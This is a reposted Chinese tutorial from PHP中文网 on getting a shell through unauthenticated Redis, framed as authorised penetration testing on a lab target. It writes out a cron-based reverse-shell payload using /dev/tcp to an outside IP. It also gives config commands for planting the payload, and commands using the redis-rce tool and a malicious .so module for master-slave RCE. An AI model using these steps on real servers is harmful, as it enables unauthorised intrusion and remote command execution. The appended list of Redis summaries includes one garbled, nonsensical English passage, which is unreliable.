Redis+Getshell的示例分析-Redis-PHP中文网

首页

数据库

Redis

Redis+Getshell的示例分析

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

May 27, 2023 pm 08:43 PM

redisgetshell

前言：

通常情况下，当进行授权渗透测试时，即使尝试了传统漏洞攻击（如注入、文件上传等），却无法获得任何信息时，扫描端口还是可能会带来意料之外的收获。

知己知彼乃百战不殆，Redis介绍：

简单来说 redis 就是一个Key-Value类型的数据库， redis 所有数据全部在内存中进行操作，并且它可以将内存中的数据定期存储在磁盘中，并且支持保存多种数据结构(String、hash、list等)。

运筹帷幄之中，Redis漏洞：

1、未授权访问漏洞

Redis在默认情况下，会绑定在0.0.0.0:6379，如果没有采用限制IP访问，就会将Redis服务暴露在公网上，并且在没有设置密码认证的情况下，会导致任意用户未授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。

当拿到数据库权限是不会满足我们的，我们的目标只有一个getshell！

目前较主流的两个方法，第一种定时计划反弹shell、第二种利用主从复制rce。

2、定时计划反弹shell

1）set x "\n* * * * * bash -i >& /dev/tcp/1.1.1.1/888 0>&1\n"

2）config set dir /var/spool/cron/

3）config set dbfilename root

4）save

3、利用主从复制rce

漏洞存在于4.x、5.x版本中，Redis提供了主从模式，主从模式指使用一个redis作为主机，其他的作为备份机，主机从机数据都是一样的，从机只负责读，主机只负责写。在Reids 4.x之后，通过外部拓展，可以实现在redis中实现一个新的Redis命令，构造恶意.so文件。在两个Redis实例设置主从模式的时候，Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载恶意so文件，即可执行命令。

需要利用一个工具，GitHub下载即可。

1）git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand（需要make）

2）git clone https://github.com/Ridter/redis-rce.git

进而通过未授权访问或者弱口令连接redis，执行脚本即可获取shell。
Redis+Getshell的示例分析

决胜千里之外，实战演练：

本次扫到了6379也就是Redis，有的时候可能或改默认端口，建议全端口扫描,本次利用主从复制rce获取shell(由于该漏洞已提交src，签约保密协议，故搭建靶机还原真实环境，保证原汁原味。)

攻击端ip：192.168.109.134

服务端ip：192.168.109.136

Redis+Getshell的示例分析通过未授权访问连接redis（如果有密码，可以尝试爆破，authpassword 登陆系统）：Redis-cli –h ip
利用主从复制rce获取shell

首先要生成恶意.so文件，下载RedisModules-ExecuteCommand使用make编译即可生成。
Redis+Getshell的示例分析攻击端执行：

python redis-rce.py -r 目标ip-p 目标端口 -L 本地ip -f 恶意.so

成功获取shell
Redis+Getshell的示例分析

以上是Redis+Getshell的示例分析的详细内容。更多信息请关注PHP中文网其他相关文章！

声明

本文转载于：亿速云。如有侵权，请联系admin@php.cn删除

REDIS：NOSQL方法的优势Apr 27, 2025 am 12:09 AM

Redis是NoSQL数据库，提供高性能和灵活性。1)通过键值对存储数据，适合处理大规模数据和高并发。2)内存存储和单线程模型确保快速读写和原子性。3)使用RDB和AOF机制进行数据持久化，支持高可用性和横向扩展。

REDIS：了解其架构和目的Apr 26, 2025 am 12:11 AM

Redis是一种内存数据结构存储系统，主要用作数据库、缓存和消息代理。它的核心特点包括单线程模型、I/O多路复用、持久化机制、复制与集群功能。 Redis在实际应用中常用于缓存、会话存储和消息队列，通过选择合适的数据结构、使用管道和事务、以及进行监控和调优，可以显着提升其性能。

REDIS与SQL数据库：关键差异Apr 25, 2025 am 12:02 AM

Redis和SQL数据库的主要区别在于：Redis是内存数据库，适用于高性能和灵活性需求；SQL数据库是关系型数据库，适用于复杂查询和数据一致性需求。具体来说，1)Redis提供高速数据访问和缓存服务，支持多种数据类型，适用于缓存和实时数据处理；2)SQL数据库通过表格结构管理数据，支持复杂查询和事务处理，适用于电商和金融系统等需要数据一致性的场景。

REDIS：它如何充当数据存储和服务Apr 24, 2025 am 12:08 AM

REDISACTSASBOTHADATASTOREANDASERVICE.1）ASADATASTORE，ITUSESIN-MEMORYSTOOGATOFORFOFFASTESITION，支持VariousDatharptructuresLikeKey-valuepairsandsortedsetsetsetsetsetsetsets.2）asaservice，ItprovidespunctionslikeItionitionslikepunikeLikePublikePublikePlikePlikePlikeAndluikeAndluAascriptingiationsmpleplepleclexplectiations

REDIS与其他数据库：比较分析Apr 23, 2025 am 12:16 AM

Redis与其他数据库相比，具有以下独特优势：1)速度极快，读写操作通常在微秒级别；2)支持丰富的数据结构和操作；3)灵活的使用场景，如缓存、计数器和发布订阅。选择Redis还是其他数据库需根据具体需求和场景，Redis在高性能、低延迟应用中表现出色。

REDIS的角色：探索数据存储和管理功能Apr 22, 2025 am 12:10 AM

Redis在数据存储和管理中扮演着关键角色，通过其多种数据结构和持久化机制成为现代应用的核心。1）Redis支持字符串、列表、集合、有序集合和哈希表等数据结构，适用于缓存和复杂业务逻辑。2）通过RDB和AOF两种持久化方式，Redis确保数据的可靠存储和快速恢复。

REDIS：了解NOSQL概念Apr 21, 2025 am 12:04 AM

Redis是一种NoSQL数据库，适用于大规模数据的高效存储和访问。1.Redis是开源的内存数据结构存储系统，支持多种数据结构。2.它提供极快的读写速度，适合缓存、会话管理等。3.Redis支持持久化，通过RDB和AOF方式确保数据安全。4.使用示例包括基本的键值对操作和高级的集合去重功能。5.常见错误包括连接问题、数据类型不匹配和内存溢出，需注意调试。6.性能优化建议包括选择合适的数据结构和设置内存淘汰策略。